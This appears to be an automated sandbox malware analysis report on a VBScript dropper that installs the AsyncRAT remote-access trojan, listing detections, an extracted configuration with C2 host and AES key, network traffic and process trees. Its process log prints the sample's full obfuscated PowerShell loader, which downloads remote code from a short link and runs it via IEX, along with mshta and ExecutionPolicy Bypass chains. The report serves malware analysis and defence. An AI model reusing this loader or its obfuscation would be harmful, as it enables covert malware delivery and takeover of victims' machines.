Windows Analysis Report KDH32783JHC73287SDF87.VBS

Overview

General Information

Sample Name: KDH32783JHC73287SDF87.VBS
Analysis ID: 490264
MD5: 51bada4133b4400a6f7acac7e67695af
SHA1: 53d9b24ac41d2c5b5452c004797a9aff04a64487
SHA256: 14670db63054f493d6b33519e1eab9caf1dd1576999ffedf775d19119c0d78e2
Tags: AsyncRAT, vbs

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Antivirus detection for dropped file
Yara detected Powershell download and execute
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Compiles code for process injection (via .Net compiler)
Wscript starts Powershell (via cmd or directly)
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sigma detected: Suspicious PowerShell Command Line
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Sigma detected: MSHTA Spawning Windows Shell
Obfuscated command line found
Creates an undocumented autostart registry key
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Csc.exe Source File Folder
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

Found malware configuration
Source: 27.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: AsyncRAT {"Server": "mo1010.duckdns.org", "Ports": "1010", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "cavQVZf7osGMKDDytqZ6EDmJ5n2UgBk8", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "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", "ServerSignature": "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", "Group": "Default"}
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.dll Avira: detection malicious, Label: HEUR/AGEN.1138338
Antivirus or Machine Learning detection for unpacked file
Source: 27.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.139.125:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.66.125:443 -> 192.168.2.6:49738 version: TLS 1.0
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: yDictionary`2<Module>System.IOCosturamscorlibSystem.Collections.GenericReadThreadLoadAddisAttachedInterlockedcostura.entrypointdll.pdb.compressedcostura.entrypointdll.dll.compressedSynchronizeddefaultInstancesourceCompressionModeExchangenullCacheIDisposableRuntimeTypeHandleGetTypeFromHandleget_NameGetNamerequestedAssemblyNamefullnameTypeget_Cultureset_CultureresourceCulturecultureApplicationSettingsBaseDisposeEditorBrowsableStateWriteSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteTryGetValuevalueadd_AssemblyResolveFodyTest.exeSystem.ThreadingSystem.Runtime.VersioningCultureToStringAttachget_LengthEndsWithnullCacheLockSystem.ComponentModelEntryPointDllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemresourceManMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.ConfigurationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonRunCopyToget_CultureInfoSleepAssemblyLoadersenderget_ResourceManagerResolveEventHandlerSystem.CodeDom.CompilerEnter.ctor.cctorMonitorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesReadFromEmbeddedResourcesFodyTest.Properties.Resources.resourcesDebuggingModesGetAssembliesFodyTest.PropertiesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsSettingsResolveEventArgsEqualsFormatObjectExitget_DefaultToLowerInvariantFodyTestProcessedByFodyContainsKeyget_AssemblyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyEntryIsNullOrEmpty;FodyTest.Properties.Resources source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.455396279.000001F46A6B3000.00000004.00000001.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: $costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: EntryPointDll.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: entrypointdllIcostura.entrypointdll.dll.compressedIcostura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Public\FodyTest\FodyTest\obj\Debug\FodyTest.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: omation.pdb@ source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: c:\dev\sqlite\dotnet\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 77.247.127.198:1010 -> 192.168.2.6:49746
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: mo1010.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: mo1010.duckdns.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /7854610 HTTP/1.1Host: chilp.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyseventeen/template-parts/header/java/php.jpg HTTP/1.1Host: java-eg.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyseventeen/template-parts/header/java/i2.jpg HTTP/1.1Host: java-eg.com
Source: global traffic HTTP traffic detected: GET /7854610 HTTP/1.1Host: chilp.itConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.139.125:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.66.125:443 -> 192.168.2.6:49738 version: TLS 1.0
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49746 -> 77.247.127.198:1010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: powershell.exe, 00000002.00000002.439146366.000001F400D86000.00000004.00000001.sdmp String found in binary or memory: http://chilp.it
Source: powershell.exe, 00000002.00000002.433154001.000001F400439000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.439117897.000001F400D82000.00000004.00000001.sdmp String found in binary or memory: http://chilp.it/7854610
Source: powershell.exe, 00000002.00000002.433154001.000001F400439000.00000004.00000001.sdmp String found in binary or memory: http://chilp.itx
Source: powershell.exe, 00000002.00000002.454545582.000001F46A350000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.482653968.00000160DC160000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.484137137.00000160DC6A5000.00000004.00000001.sdmp String found in binary or memory: http://crl.miV
Source: powershell.exe, 0000000A.00000002.484137137.00000160DC6A5000.00000004.00000001.sdmp String found in binary or memory: http://crl.micros
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.27.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 0000001B.00000003.484202985.0000000005651000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5a49a674e05d4
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000002.00000002.439192366.000001F400DA0000.00000004.00000001.sdmp String found in binary or memory: http://java-eg.com
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.456438717.00000160C4088000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.430280365.000001F400001000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.454457728.00000160C3D11000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.456438717.00000160C4088000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it
Source: powershell.exe, 00000002.00000002.438233615.000001F400C89000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it/7854
Source: powershell.exe, 00000002.00000002.438233615.000001F400C89000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it/7854610
Source: powershell.exe, 00000002.00000002.438233615.000001F400C89000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it/7854610X
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.447667519.000001F401AD9000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.439146366.000001F400D86000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/i1.jpg
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/i2.jpg
Source: powershell.exe, 00000002.00000002.433057897.000001F40041C000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.433154001.000001F400439000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/php.jpg
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com8
Source: powershell.exe, 00000002.00000002.433170103.000001F40043F000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.comx
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp String found in binary or memory: https://system.data.sqlite.org/
Source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp String found in binary or memory: https://system.data.sqlite.org/X
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: chilp.it

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR

System Summary:

Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Yara signature match
Source: Process Memory Space: powershell.exe PID: 6616, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Detected potential crypto function
PE file does not import any functions
Source: vfl4qio1.dll.25.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: KDH32783JHC73287SDF87.VBS Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\KDH32783JHC73287SDF87.VBS'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\Music\vb.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\ServiceState\WindowsStateRepositoryCore.vbs'
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:Execute('CreateObject(''WScript.Shell'').Run ''powershell -ExecutionPolicy Bypass & 'C'+':'+'\'+'U'+'s'+'e'+'r'+'s'+'\'+'P'+'u'+'b'+'l'+'i'+'c'+'\Service.ps1''', 0:close')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass & 'C:\Users\Public\Service.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF057.tmp' 'c:\Users\user\AppData\Local\Temp\vfl4qio1\CSC646E655CB52D4766BD87DD83F0456ED1.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210925
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zjx0icl.5k2.ps1
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@34/34@4/4
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: 27.2.RegAsm.exe.400000.0.unpack, Client/Settings.cs Base64 encoded string: (encoded configuration strings omitted)
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\KDH32783JHC73287SDF87.VBS'
